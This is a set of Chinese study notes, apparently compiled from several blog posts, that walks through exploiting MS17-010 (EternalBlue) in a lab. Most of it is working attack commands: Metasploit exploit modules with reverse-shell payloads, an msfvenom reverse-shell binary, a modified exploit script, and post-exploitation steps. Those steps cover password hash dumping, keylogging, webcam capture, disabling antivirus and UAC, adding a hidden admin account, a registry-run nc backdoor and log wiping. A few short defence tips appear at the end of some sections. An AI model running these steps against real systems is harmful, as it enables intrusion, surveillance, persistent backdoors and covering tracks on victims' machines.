郑重声明：
本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。

漏洞学习之：MS17-010

MS17-010 漏洞通过向主机的 SMBv1 服务发送恶意命令造成举出，最终导致任意命令执行。在 Windows 系统中 SMB 服务默认是开启的，监听端口默认为 445。影响的系统版本有 Windows NT–WinServer 2012。

利用前提：目标主机关闭了防火墙

1 利用 MSF 复现 MS17-010 漏洞

1. 查看 MSF 中关于 MS17-010 漏洞的模块

   search ms17-010

   

2. 使用 auxiliary/scanner/smb/smb_ms17_010 模块进行漏洞检测

   use auxiliary/scanner/smb/smb_ms17_010
   set rhosts 192.168.0.0/24
   set threads 50
   run
   

   

3. 使用 exploit/windows/smb/ms17_010_eternalblue 模块进行漏洞利用

   use exploit/windows/smb/ms17_010_eternalblue
   set rhosts 192.168.0.19
   set payload windows/x64/meterpreter/reverse_tcp
   run
   

   

2 利用 MS17-010 攻击脚本复现漏洞

1. 查看存在 MS17-010 漏洞的主机

   nmap -A -p 445 --script vuln 192.168.0.19

   

2. 查找可利用的攻击脚本

   searchsploit ms17-010

   

3. 选择 windows/remote/42315.py 攻击脚本进行复现

4. 生成反弹 shell 的恶意程序

   msfvenom lhost=192.168.0.2 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > evil.exe

5. 修改 42315.py 脚本内容如下：

   # 目标主机账户名称：administrator
   USERNAME = 'administrator'
   # 目标主机账户密码：Admin123
   PASSWORD = 'Admin123'
   

6. 执行查看目标主机的 C 盘是否存在 pwned.txt 文档，如果存在，说明可以正常利用该攻击脚本

   

7. 若执行脚本报错如下：则说明缺少 mysmb 模块

   └─# python 42315.py 192.168.0.19 
   Traceback (most recent call last):
     File "42315.py", line 3, in <module>
       from mysmb import MYSMB
   ImportError: No module named mysmb
   
   
   # 解决方案：
   git clone https://github.com/worawit/MS17-010
   并将 42315.py 脚本也移动到该目录下，再执行
   

8. 修改 42315.py 脚本的 Payload，以便返弹 shell

   def smb_pwn(conn, arch):
   	smbConn = conn.get_smbconnection()
   
   	# print('creating file c:\\pwned.txt on the target')
   	# tid2 = smbConn.connectTree('C$')
   	# fid2 = smbConn.createFile(tid2, '/pwned.txt')
   	# smbConn.closeFile(tid2, fid2)
   	# smbConn.disconnectTree(tid2)
   
   	smb_send_file(smbConn, '要上传文件的完整路径', '上传的盘符位置', '/上传的文件名')
   	service_exec(conn, r'cmd /c c:\\上传的文件名')
   	# Note: there are many methods to get shell over SMB admin session
   	# a simple method to get shell (but easily to be detected by AV) is
   	# executing binary generated by "msfvenom -f exe-service ..."
   
   

   

9. 本地配置监听反弹 shell 链接

   nc -nvlp 4444

10. 执行攻击脚本并确认建立反弹 shell 链接

    

    

3 防御 EternalBlue 方法

1. 禁用 SMBv1 协议
2. 打开 Windows Update，或者手动安装 KB2919355
3. 使用防火墙阻止 445 端口的连接，或通过进/出站规则阻止 445 端口
4. 安装杀毒软件

---

一、永恒之蓝（Eternal Blue）

永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、复现环境

攻击机：kali (192.168.203.130)
靶机：Windows 7 (192.168.203.134)

三、复现过程

1.主机发现

nmap进行ip端口扫描：

nmap -T4 -A -v 192.168.203.134#靶机ip地址

扫描到开放了445端口，而永恒之蓝利用的就是445端口的smb服务，操作系统溢出漏洞。

2.进入MSF框架

msfconsole

search ms17-010

通过这两个工具，其中
0 exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码，一般两者配合使用，前者先扫描，若是显示有漏洞，再进行攻击。
3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块，探测主机是否存在MS17-010漏洞。

3.使用ms17-010扫描模块，对靶机进行扫描

3.1使用模块

该模块不会直接在攻击机和靶机之间建立访问，他们只负责执行扫描，嗅探，指纹识别的相关功能，以辅助渗透测试。

use auxiliary/scanner/smb/smb_ms17_010

3.2查看模块需要配置的参数

show options

Required栏中选项为yes的说明对应的Current Setting栏需要填写，如RHOSTS。

3.3设置攻击目标

RHOSTS 参数是要探测主机的ip或ip范围
设置攻击目标ip：

set rhosts  192.168.203.134

3.4再次查看配置参数

show options 

3.5执行扫描

run

显示主机可能容易受到 MS17-010 的攻击！ - Windows 7 x64（64 位）

4.使用ms17-010攻击模块，对靶机进行攻击

use exploit/windows/smb/ms17_010_eternalblue

4.1查看这个漏洞的信息

info

4.2查看可攻击的系统平台

这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统

show targets

这里只有一个，有些其他的漏洞模块对操作系统的语言和版本要求的很严，比如MS08_067，这样就要我们指定目标系统的版本的。如果不设置的话，MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)。

4.3查看攻击载荷

攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，成功渗透目标后，用于在目标系统上运行任意命令。

show payloads

该命令可以查看当下漏洞利用模块下可用的所有Payload

4.4设置攻击载荷（默认windows/x64/meterpreter/reverse_tcp）

set payload windows/x64/meterpreter/reverse_tcp

4.5查看参数配置

show options

4.6设置目标攻击目标ip

set rhosts 192.168.203.134(如果有多个攻击目标ip间直接用空格隔开就行)

4.6设置监听主机（kali）

set LHOST 192.168.203.130

4.7执行攻击

exploit(run)

攻击成功，显示下图：
在这里可以进行文件上传下载，获取截屏，获取密码，使用摄像头拍照，后门持久化等操作。

5.后渗透阶段

运行了exploit命令之后，我们开启了一个reverse TCP监听器来监听本地的 4444 端口，即攻击者的本地主机地址（LHOST）和端口号（LPORT）。

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作：
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户，密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
clearev                       #清除日志

示例：

查看主机系统信息

sysinfo

查看主机ip

ipconfig

查看用户身份

getuid

用户身份为： NT AUTHORITY\SYSTEM，这个也就是Windows的系统权限

获得shell控制台

shell

想要从目标主机shell退出到meterpreter

exit

获取截屏

screenshot

下面的模块主要用于在取得目标主机系统远程控制权后，进行一系列的后渗透攻击动作。

run post/windows/manage/migrate                  #自动进程迁移     
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上     
run post/windows/manage/killav                   #关闭杀毒软件     
run post/windows/manage/enable_rdp               #开启远程桌面服务     
run post/windows/manage/autoroute                #查看路由信息     
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户     
run post/windows/gather/enum_applications        #列举应用程序     
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码     
run windows/gather/smart_hashdump                #dump出所有用户的hash

示例：

获取用户密码

run windows/gather/smart_hashdump或者hashdump

在网上搜索MD5破解即可查到相关破解网站：

创建新的管理员账户

进入shell控制台

在目标主机上创建一个名为hack的用户，密码为123

net user hack 123 /add

将hack加入到windows 7的本地管理员组中，以便获得更大权限

net localgroup administrators hack /add

查看本地用户

net user

查看本地管理员

net localgroup administrators

可以看到hack已经被添加到windows管理员组中。

开启远程桌面

运用getuid脚本开启目标主机远程桌面：

run getgui -e或者run post/windows/manage/enable_rdp

在kali终端输入

rdesktop 192.168.203.134#靶机ip地址

即可打开远程桌面

6.关闭主机防护策略并开启后门

6.1查看用户及密码

hashdump

6.2创建防火墙规则

创建一条防火墙规则允许4444端口访问网络，方便后期操作

shell

netsh firewall add portopening TCP 4444 "hack" ENABLE ALL

新建一个防火墙规则，允许443端口访问网络

netsh firewall add portopening TCP 443 "hack" ENABLE ALL

6.3关闭UAC

其原理就是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，以达到帮助阻止恶意程序损坏系统的效果。

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
-f 强制修改注册表项

6.4开启默认共享

开启系统主机的默认共享，默认共享对于主机文件共享非常方便，也方便黑客利用这个功能，远程执行命令。

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

exit返回meterpreter，输入background将永恒之蓝拿到的会话保持到后台。

6.5使用扫描模块

use exploit/windows/smb/psexec

6.6查看需要设置的参数

show options

设置靶机ip：set rhosts 192.168.203.134
设置靶机账户名：set smbuser hack
设置靶机密码：set smbpass （hack账户密码hash值）
设置靶机工作组：set smbdomain WORKGROUP
运行：run

6.7上传后门程序

为了让连接持久话，我们可以上传后门程序，这样就能保持会话长久建立。在kali 里面如下路径有我们的后门程序nc 俗称瑞士军刀。我们可以将它上传到目标机c盘里面

上传nc到c盘windows文件夹中，如果想更隐蔽一点，可以在往文件夹里面上传

打开靶机window文件夹可以看到成功上传文件。

6.8设置键值

当目标机开机，程序后台运行，且监听端口为443，这个端口就是之前在shell中创建的新防火墙规则：允许443端口访问网络。

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

6.9重启目标主机

reboot

在kali终端就可以直接使用

nc -v 192.168.203.134 443

连接了。

这样就可以直接通过nc监听靶机。
至此，永恒之蓝的攻击复现就完成了，后续其他的进一步攻击可以向上传nc一样上传病毒。

7.清除事件日志

由于攻击过程中的所有操作都会被记录在目标系统的日志文件之中，因此需要在完成攻击之后使用

clearev  

命令来清除事件日志：

四、漏洞防御

关闭445端口。
打开防火墙，安装安全软件。
安装对应补丁

参考文章

https://blog.csdn.net/qq_44159028/article/details/104044002
https://cxymm.net/article/dreamthe/121375464#%C2%A03.%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E5%88%A9%E7%94%A8%E4%B9%8B%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%99%BB%E5%BD%95%E3%80%82

---

复现时出现的问题

在复现时曾经使用过Windows8和Windows10来作为靶机，但是在使用ms17-010攻击模块

use exploit/windows/smb/ms17_010_eternalblue

时，却出现这样的错误提示：
Windows8

Started reverse TCP handler on 192.168.203.130:4444 
192.168.203.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
192.168.203.132:445   - Host is likely VULNERABLE to MS17-010! - Windows 8 9200 x64 (64-bit)
192.168.203.132:445   - Errno::ECONNRESET: Connection reset by peer
192.168.203.132:445   - Scanned 1 of 1 hosts (100% complete)
192.168.203.132:445 - The target is vulnerable.
192.168.203.132:445 - shellcode size: 1283
192.168.203.132:445 - numGroomConn: 12
192.168.203.132:445 - Target OS: Windows 8 9200
192.168.203.132:445 - CommunicationError encountered. Have you set SMBUser/SMBPass?
192.168.203.132:445 - Exploit failed with the following error: Read timeout expired when reading from the Socket (timeout=30)
Exploit completed, but no session was created.

Windows10

搜索半天没弄明白，以后有机会再研究。

0x00 前置知识

        1、所需工具：

                攻击机：kali（nmap、msf）

                靶机：windows server 2008 r2

        2、永恒之蓝漏洞原理

                1）简介：

                永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
                原文链接：https://blog.csdn.net/wwl012345/article/details/89421881

                2）原理：

                漏洞出现在win系统内核函数srv!SrvOs2FeaListToNt在处理内核数据时，出现了缓冲区溢出。主要错误步骤如下：

        a、srv!SrvOs2FeaListSizeToNt计算FEA list的大小并更新待转换的FEA list的大小；

        b、错误的使用WORD强制类型转换，导致计算出来的待转换的FEA list的大小比真正的FEA list大；由于错误计算，从而在实际操作过程中出现缓冲区溢出。

                具体漏洞分析及溢出原理分析参考：【漏洞分析】MS17-010：深入分析“永恒之蓝”漏洞_maybezyy的博客-CSDN博客_永恒之蓝漏洞原理

0x01漏洞复现

        1、漏洞扫描

nmap --script=vuln ip

            

        发现永恒之蓝漏洞

        或者用nusses扫描漏洞也行：

               

        2、  漏洞利用

        1）打开msf

msfconsole

                 

                2）查找ms17-010

                  

                3）使用ms17-010进行漏洞扫描；其中

                        扫描命令：use auxiliary/scanner/smb/smb_ms17_010

                        攻击命令：use exploit/windows/smb/ms17_010_eternalblue

               a、 首先使用扫描命令进入漏洞扫描模块：

                                           ​​​​​​​

                b、设置一下RHOSTS（要扫描的主机），注意必须是大写，这里用小写后面报错了又改成大写：

                           

                扫描出来了存在ms17_010漏洞的主机，也就是我的靶机

                             

                 c、使用上面写的攻击模块use exploit/windows/smb/ms17_010_eternalblue；

                       ​​​​​​​ 

                        看到它提示了没有设置payload

                d、根据提示设置一下攻击的payload（载荷）：

                          set windows/x62/meterpreter/reverse_tcp         

                        

                e、设置监听主机（就是kali）：set LHOST 192.168.1.48

                        然后exploit启动攻击：

                        

                        从上图能看到，监听主机（kali）及端口4444，被攻击主机及端口49160之间已经成功建立连接。

                进入meterpreter模块说明成功拿下靶机，进入后渗透阶段

                

        3、持续攻击（种植后门）——后渗透阶段

                //到了这里，就算是入侵成功了，后渗透阶段主要是创建一个管理员账户，以及尝试一些好玩的指令，比如截屏、开摄像头什的

        1）显示被攻击主机系统信息：sysinfo

                

        2）查看用户信息：getuid

                

              

        3）获取shell控制台：shell

                

                上面显示转到了c:\windows\system32目录下，说明成功拿到了控制权

        4）创建管理员账户 （植入后门）

                a、创建一个hack用户，方便之后访问。net user hack xxx /add

                 

                 b、对创建的hack用户进行进行提权：将hack加入到win本地的管理员组

                        net localgroup administrators hack /add

                        

                c、查看一下攻击机的管理员：net localgroup adminidtrators

                        这里查很多次没有，后来改了乱码（输入：chcp 65001）发现创建hack账户对密码有要求，所以又重新弄了

                （这些是失败的）

                

                

                

                改了个复杂的密码才创建成功：

                

                 

                成功将hack2账户提权为管理员。

——————————————————————————————————————

永恒之蓝复现successfully，睡觉。。。